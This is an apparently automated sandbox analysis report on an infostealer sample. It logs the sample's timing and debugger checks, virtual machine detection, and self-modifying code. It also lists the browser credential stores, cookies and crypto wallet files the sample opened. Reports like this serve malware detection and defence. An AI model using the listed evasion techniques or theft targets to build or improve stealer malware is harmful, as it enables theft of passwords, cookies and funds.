            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88B46 second address: D88B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88B4D second address: D88B5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2AAh 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8763E second address: D87642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87642 second address: D87646 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87921 second address: D8793A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9F5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87B14 second address: D87B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87C43 second address: D87C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87C47 second address: D87C50 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87C50 second address: D87C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4D4AC9F5h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87DA8 second address: D87DB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F2B4CC6E2A6h 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D888BF second address: D888D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9F0h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C3C0 second address: D8C3C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C3C4 second address: D8C3D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C3D3 second address: D8C3D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C3D8 second address: D8C3DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8EC84 second address: D8EC88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9A7D7 second address: D9A7E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F2B4D4AC9E8h 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9D0E3 second address: D9D104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 jo 00007F2B4CC6E2A6h 0x0000000e pop edi 0x0000000f jno 00007F2B4CC6E2B2h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9D104 second address: D9D109 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA9C93 second address: DA9CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4CC6E2B7h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAB80B second address: DAB811 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAB811 second address: DAB815 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAB815 second address: DAB824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAB824 second address: DAB82B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAB99E second address: DAB9AC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2B4D4AC9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAB9AC second address: DAB9B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAB9B2 second address: DAB9B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAB9B6 second address: DAB9C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jg 00007F2B4CC6E2A6h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAB9C9 second address: DAB9F7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2B4D4AC9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F2B4D4AC9EDh 0x00000010 jmp 00007F2B4D4AC9F2h 0x00000015 push edi 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC032A second address: DC034B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2B4CC6E2A6h 0x0000000a pop edx 0x0000000b jmp 00007F2B4CC6E2B2h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC034B second address: DC034F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC049C second address: DC04C2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2B4CC6E2A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F2B4CC6E2B9h 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC060F second address: DC0616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ecx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC0E8F second address: DC0E95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC0FC4 second address: DC0FDF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F2B4D4AC9EBh 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 push esi 0x00000011 pop esi 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop edi 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC1187 second address: DC118B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: CD8A7F instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: CFF66A instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: CE8821 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: D62D54 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
            Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
            Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B38A35 rdtsc 0_2_00B38A35
            Source: C:\Users\user\Desktop\file.exe TID: 8428 | Thread sleep time: -34017s >= -30000s
            Source: C:\Users\user\Desktop\file.exe TID: 8400 | Thread sleep time: -34017s >= -30000s
            Source: C:\Users\user\Desktop\file.exe TID: 8544 | Thread sleep time: -150000s >= -30000s
            Source: C:\Users\user\Desktop\file.exe TID: 8404 | Thread sleep time: -34017s >= -30000s
            Source: C:\Users\user\Desktop\file.exe TID: 8544 | Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: file.exe, file.exe, 00000000.00000002.1759057360.0000000000CB8000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: file.exe, 00000000.00000003.1573531425.0000000005828000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696428655p
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: file.exe, 00000000.00000003.1757983380.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1757851048.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758790441.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1676138982.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1638552100.00000000009FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1697028773.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758627826.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696428655t
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: file.exe, 00000000.00000002.1759057360.0000000000CB8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
            Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
            Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
            Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
            Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
            Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
            Source: C:\Users\user\Desktop\file.exe | File opened: SICE
            Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
            Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
            Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
            Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B38A35 rdtsc 0_2_00B38A35
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B19660 LdrInitializeThunk,0_2_00B19660
            Source: file.exe, file.exe, 00000000.00000002.1759057360.0000000000CB8000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: rK2Program Manager
            Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: file.exe, 00000000.00000003.1676138982.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1676138982.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1676473842.0000000000A17000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1757983380.0000000000A18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1731678959.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758812343.0000000000A18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1731950919.0000000000A17000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1697028773.00000000009FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            Source: Yara match | File source: Process Memory Space: file.exe PID: 8384, type: MEMORYSTR
            Source: Yara match | File source: 0.2.file.exe.ad0000.0.unpack, type: UNPACKEDPE
            Source: file.exe, 00000000.00000003.1676138982.00000000009FD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum-LTC
            Source: file.exe, 00000000.00000003.1676138982.00000000009FD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
            Source: file.exe, 00000000.00000003.1638705497.0000000000A7B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Jaxx Liberty
            Source: file.exe, 00000000.00000003.1676138982.00000000009FD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
            Source: file.exe, 00000000.00000003.1636635709.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet/
            Source: file.exe, 00000000.00000003.1637044911.0000000005750000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ExodusWeb3
            Source: file.exe, 00000000.00000003.1676138982.00000000009FD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Ethereum
            Source: file.exe, 00000000.00000003.1638488484.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: file.exe, 00000000.00000003.1638647726.00000000009DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
            Source: file.exe, 00000000.00000003.1638752339.0000000000A17000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Electrum-LTC\wallets\U
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
